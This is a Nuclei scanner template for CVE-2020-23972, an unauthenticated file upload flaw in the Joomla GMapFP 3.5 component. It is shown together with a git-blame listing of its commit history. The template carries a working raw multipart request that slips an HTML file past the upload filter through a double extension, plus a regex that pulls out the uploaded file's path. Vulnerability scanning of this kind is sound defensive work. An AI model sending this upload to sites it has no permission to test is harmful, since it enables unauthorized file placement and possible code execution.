nuclei-templates/http/cves/2020/CVE-2020-23972.yaml

id: CVE-2020-23972

info:
  name: Joomla! Component GMapFP 3.5 - Arbitrary File Upload
  author: dwisiswant0
  severity: high
  description: |
    Joomla! Component GMapFP 3.5 is vulnerable to arbitrary file upload vulnerabilities. An attacker can access the upload function of the application
    without authentication and can upload files because of unrestricted file upload which can be bypassed by changing Content-Type & name file too double ext.
  impact: |
    Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected Joomla! website.
  remediation: |
    Apply the latest security patch or update to a patched version of Joomla! Component GMapFP 3.5 to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/49129
    - https://raw.githubusercontent.com/me4yoursecurity/Reports/master/README.md
    - http://packetstormsecurity.com/files/159072/Joomla-GMapFP-J3.5-J3.5F-Arbitrary-File-Upload.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-23972
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-23972
    cwe-id: CWE-434
    epss-score: 0.53621
    epss-percentile: 0.9756
    cpe: cpe:2.3:a:gmapfp:gmapfp:j3.5:*:*:*:-:joomla\!:*:*
  metadata:
    max-request: 2
    vendor: gmapfp
    product: gmapfp
    framework: joomla\!
  tags: cve2020,cve,joomla,edb,packetstorm,fileupload,intrusive,gmapfp,joomla\!
variables:
  name: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST /index.php?option={{component}}&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Referer: {{BaseURL}}
        Connection: close

        ------WebKitFormBoundarySHHbUsfCoxlX1bpS
        Content-Disposition: form-data; name="option"

        com_gmapfp
        ------WebKitFormBoundarySHHbUsfCoxlX1bpS
        Content-Disposition: form-data; name="image1"; filename="{{name}}.html.gif"
        Content-Type: text/html

        projectdiscovery

        ------WebKitFormBoundarySHHbUsfCoxlX1bpS
        Content-Disposition: form-data; name="no_html"

        no_html
        ------WebKitFormBoundarySHHbUsfCoxlX1bpS--

    payloads:
      component:
        - "com_gmapfp"
        - "comgmapfp"

    extractors:
      - type: regex
        regex:
          - "window\\.opener\\.(changeDisplayImage|addphoto)\\(\"(.*?)\"\\);"
        part: body
# digest: 4b0a00483046022100e63b322ff55fa79a7de810f96ac018fe740ac8632e0532cb83816f0dbe09eab1022100b402ab341d6e7fd5f75477f035b28345da5313727856556e321cf238859fe49a:922c64590222798bb761d5b6d8e72950
misc changes 2021-01-02 04:56:15 +00:00			`id: CVE-2020-23972`
:fire: Add CVE-2020-23972 2020-12-01 09:25:33 +00:00
			`info:`
Dashboard Content Enhancements (#4819) Dashboard Content Enhancements 2022-07-26 13:45:11 +00:00			`name: Joomla! Component GMapFP 3.5 - Arbitrary File Upload`
:fire: Add CVE-2020-23972 2020-12-01 09:25:33 +00:00			`author: dwisiswant0`
			`severity: high`
			`description: \|`
Dashboard Content Enhancements (#4819) Dashboard Content Enhancements 2022-07-26 13:45:11 +00:00			`Joomla! Component GMapFP 3.5 is vulnerable to arbitrary file upload vulnerabilities. An attacker can access the upload function of the application`
			`without authentication and can upload files because of unrestricted file upload which can be bypassed by changing Content-Type & name file too double ext.`
Added Impact 2023-09-27 15:51:13 +00:00			`impact: \|`
			`Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected Joomla! website.`
updated 2020 CVEs 2023-09-06 12:22:36 +00:00			`remediation: \|`
			`Apply the latest security patch or update to a patched version of Joomla! Component GMapFP 3.5 to mitigate this vulnerability.`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`reference:`
			`- https://www.exploit-db.com/exploits/49129`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`- https://raw.githubusercontent.com/me4yoursecurity/Reports/master/README.md`
			`- http://packetstormsecurity.com/files/159072/Joomla-GMapFP-J3.5-J3.5F-Arbitrary-File-Upload.html`
Dashboard Content Enhancements (#4819) Dashboard Content Enhancements 2022-07-26 13:45:11 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2020-23972`
TemplateMan Update [Sat Mar 23 09:28:19 UTC 2024] :robot: 2024-03-23 09:28:19 +00:00			`- https://github.com/ARPSyndicate/cvemon`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`cvss-score: 7.5`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`cve-id: CVE-2020-23972`
			`cwe-id: CWE-434`
TemplateMan Update [Sat Mar 23 09:28:19 UTC 2024] :robot: 2024-03-23 09:28:19 +00:00			`epss-score: 0.53621`
			`epss-percentile: 0.9756`
updated 2020 CVEs 2023-09-06 12:22:36 +00:00			`cpe: cpe:2.3:a:gmapfp:gmapfp:j3.5::::-:joomla\!::*`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 2`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: gmapfp`
			`product: gmapfp`
updated 2020 CVEs 2023-09-06 12:22:36 +00:00			`framework: joomla\!`
auto tagging via templateman 2024-01-14 09:21:50 +00:00			`tags: cve2020,cve,joomla,edb,packetstorm,fileupload,intrusive,gmapfp,joomla\!`
Replaced Hardcoded Nuclei Keyword 2023-07-20 07:43:09 +00:00			`variables:`
			`name: "{{to_lower(rand_text_alpha(5))}}"`

Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Payloads positional update to keep the request format uniform 2021-08-22 18:09:33 +00:00			`- raw:`
:fire: Add CVE-2020-23972 2020-12-01 09:25:33 +00:00			`- \|`
Tenda Template Enhancementleanup (#4257) * Replace § markers with {{ }} pairs * Clean up new Tenda admin panel template * Update tenda-11n-wireless-router-login.yaml Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2022-04-29 05:04:34 +00:00			`POST /index.php?option={{component}}&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1`
:fire: Add CVE-2020-23972 2020-12-01 09:25:33 +00:00			`Host: {{Hostname}}`
			`Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS`
			`Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9`
			`Referer: {{BaseURL}}`
			`Connection: close`

			`------WebKitFormBoundarySHHbUsfCoxlX1bpS`
			`Content-Disposition: form-data; name="option"`

			`com_gmapfp`
			`------WebKitFormBoundarySHHbUsfCoxlX1bpS`
Replaced Hardcoded Nuclei Keyword 2023-07-20 07:43:09 +00:00			`Content-Disposition: form-data; name="image1"; filename="{{name}}.html.gif"`
:fire: Add CVE-2020-23972 2020-12-01 09:25:33 +00:00			`Content-Type: text/html`

			`projectdiscovery`

			`------WebKitFormBoundarySHHbUsfCoxlX1bpS`
			`Content-Disposition: form-data; name="no_html"`

			`no_html`
			`------WebKitFormBoundarySHHbUsfCoxlX1bpS--`
Payloads positional update to keep the request format uniform 2021-08-22 18:09:33 +00:00
			`payloads:`
			`component:`
			`- "com_gmapfp"`
			`- "comgmapfp"`

:fire: Add CVE-2020-23972 2020-12-01 09:25:33 +00:00			`extractors:`
			`- type: regex`
			`regex:`
Tenda Template Enhancementleanup (#4257) * Replace § markers with {{ }} pairs * Clean up new Tenda admin panel template * Update tenda-11n-wireless-router-login.yaml Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2022-04-29 05:04:34 +00:00			`- "window\\.opener\\.(changeDisplayImage\|addphoto)\\(\"(.*?)\"\\);"`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`part: body`
Auto Template Signing [Mon Mar 25 11:57:16 UTC 2024] :robot: 2024-03-25 11:57:16 +00:00			`# digest: 4b0a00483046022100e63b322ff55fa79a7de810f96ac018fe740ac8632e0532cb83816f0dbe09eab1022100b402ab341d6e7fd5f75477f035b28345da5313727856556e321cf238859fe49a:922c64590222798bb761d5b6d8e72950`